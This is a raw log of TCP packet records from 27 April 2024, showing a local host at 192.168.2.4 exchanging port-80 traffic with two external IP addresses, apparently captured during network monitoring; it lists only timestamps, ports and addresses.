Apr 27, 2024 02:19:27.223927975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.223942995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.224024057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.224024057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.236953974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.236967087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.237231016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.237241983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.237251997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.280071020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.280086040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.280147076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.377088070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.377208948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.389024019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.389080048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.389137030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.389173031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.389240026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.389286041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.419339895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419400930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419472933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419504881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.419545889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419615984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.419632912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419699907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.419750929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.459513903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.459562063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.475652933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.527733088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.585371971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.585472107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.585504055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.585547924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.585601091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.585666895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.585695982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.585696936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.585696936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.585725069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.615943909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.615997076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.616048098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.616115093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.616167068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.616194963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.616194963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.616194963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.616225004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.616255999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.616306067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.631577015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.631642103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.724208117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.724308014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.767474890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:27.767541885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.782322884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.782455921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.782471895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.782505989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.782538891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.782603025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.782634974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.782663107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.782711029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.811340094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.811393976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.811444998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.811466932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.839993954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.855818033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.919764996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.965363026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.978163004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978286028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978342056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978382111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.978426933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978487015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.978506088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978558064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.978653908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.008168936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.008225918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.008349895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.012762070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:28.052187920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.105947018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.146756887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:28.146970987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:28.161972046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.174784899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.174880028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.174906969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.174979925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.175038099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.175158978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.175209999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.175229073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.175262928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.175297976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.175383091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.205794096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.205873013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.205944061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.206012011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.303339005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.303456068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371505976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371566057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371598959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371603966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371643066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371644974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371671915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371682882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371695042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371722937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.371733904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.371773005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.400645018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.400718927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.460273981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:28.497581959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.497663975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.566164970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.566349983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.566416979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.566420078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.566497087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.566498041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.566529036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.566586018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.594963074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.595134020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.595273018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.630579948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:28.637103081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.692354918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.746439934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.759814978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:28.759884119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:28.761035919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.761075020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.761121035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.761226892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.761302948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.761373997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.790931940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.831718922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.831780910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.831825972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.889857054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:28.941124916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.955938101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.956032038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.956053019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.956074953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:28.956176996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.014657021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.026900053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.026946068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.027009010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.085647106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.137074947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.150758028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.150835991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.150872946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.150883913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.150909901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.150954008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.151000023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.151037931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.151102066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.186103106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.221144915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.221184969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.221239090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.296333075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.296432018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.296483994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.296487093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.296534061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.296534061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.333022118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346431017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346524000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.346539974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346651077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346689939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346703053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.346755981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346793890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.346801996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.387058973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.417285919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.417434931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.417488098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.467122078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.467191935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.467206001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.467247009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.467331886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.467369080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.467386007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.467418909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.541848898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542001009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542068958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542068958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.542107105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542157888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.542159081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542196035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.542234898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.581439018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.613311052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.613351107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.613398075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.639456034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.639544010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.639755011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.639827013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.639856100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.639909983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.639929056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.639983892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.640074968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.640136003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.668324947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.736454964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.736552954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.736603022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.736615896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.737109900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.737148046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.737159967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.737267017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.737322092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.737370968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.777684927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.808818102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.809122086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.809171915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.810446024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.810514927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.810641050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.810698986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.810807943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.810864925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.811070919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.811126947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.811218977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.811276913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.862488985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.918313026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.932348013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.932389975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.932446957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.932610989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.932650089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.932687998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.932805061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.972609997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:29.972831964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:29.981767893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.981848955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.982332945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.982371092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.982417107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.982418060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.982692003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.982800961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:29.982892990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:29.982953072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.004168987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.004267931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.004286051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.004306078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.004468918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.114221096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.114394903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.127403021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.127419949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.127470016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.127500057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.127707958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.127722979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.127759933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.128508091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.152040005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.152148962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.152570963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.152618885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.152731895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.152731895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.153028965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.153072119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.153095007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.153122902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.168298006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.168339968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.168369055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.168529987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.199374914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.199417114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.199455976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.199551105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.199551105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.261590004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.322746038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.322937965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.323020935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.323225021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.323291063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.323566914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.323609114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.323631048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.323659897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.323914051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.323951960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.323973894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.324001074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.364161968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.364303112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.364398956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.395340919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.395618916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.395687103 CEST	49734	80	192.168.2.4	176.97.76.106
